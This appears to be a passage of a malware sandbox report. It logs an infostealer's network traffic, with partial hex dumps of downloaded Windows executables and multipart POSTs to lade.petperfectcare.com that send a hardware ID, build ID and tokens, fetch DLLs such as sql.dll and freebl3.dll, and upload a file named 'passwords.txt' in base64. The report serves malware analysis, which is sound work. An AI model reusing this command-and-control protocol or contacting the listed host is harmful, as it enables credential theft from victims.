00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 
6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:37 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 
00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:37 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 16:43:45 GMTContent-Type: application/octet-streamContent-Length: 551424Last-Modified: Mon, 07 Oct 2024 16:21:33 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "67040a8d-86a00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 89 39 06 79 e8 57 55 79 e8 57 55 79 e8 57 55 aa 9a 54 54 75 e8 57 55 aa 9a 52 54 d2 e8 57 55 aa 9a 53 54 6c e8 57 55 aa 9a 56 54 7a e8 57 55 79 e8 56 55 21 e8 57 55 69 6c 54 54 6d e8 57 55 69 6c 53 54 6b e8 57 55 69 6c 52 54 34 e8 57 55 31 6d 5e 54 78 e8 57 55 31 6d a8 55 78 e8 57 55 31 6d 55 54 78 e8 57 55 52 69 63 68 79 e8 57 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8d 0a 04 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 29 00 12 02 00 00 62 06 00 00 00 00 00 52 6f 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 71 34 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 c6 02 00 28 00 00 00 00 80 08 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 08 00 d4 1a 00 00 c0 ab 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ab 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 10 02 00 00 10 00 00 00 12 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 
9d 00 00 00 30 02 00 00 9e 00 00 00 16 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 a3 05 00 00 d0 02 00 00 96 05 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 03 00 00 00 80 08 00 00 04 00 00 00 4a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 1a 00 00 00 90 08 00 00 1c 00 00 00 4e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECBFIDGDAKFHIEHJKFHost: lade.petperfectcare.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 31 33 38 44 39 44 41 42 35 30 44 32 38 36 35 38 36 36 33 30 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="hwid"5138D9DAB50D2865866309-a33c7340-61ca------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------FIECBFIDGDAKFHIEHJKF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBAFCFIJJJECBGIIJKHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 41 46 43 46 49 4a 4a 4a 45 43 42 47 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------EGCBAFCFIJJJECBGIIJKContent-Disposition: form-data; name="mode"1------EGCBAFCFIJJJECBGIIJK--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHDHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="mode"2------JEBKECAFIDAFIECBKEHD--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: lade.petperfectcare.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="mode"21------GIIEGHIDBGHIECAAECGD--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGIHost: lade.petperfectcare.comContent-Length: 5289Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: lade.petperfectcare.comContent-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: lade.petperfectcare.comContent-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: lade.petperfectcare.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file_data"------DAKEBAKFHCFHIEBFBAFB--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFBHost: lade.petperfectcare.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 2d 2d 0d 0a Data Ascii: ------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="file_data"------IJEGDBGDBFIJKECBAKFB--
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
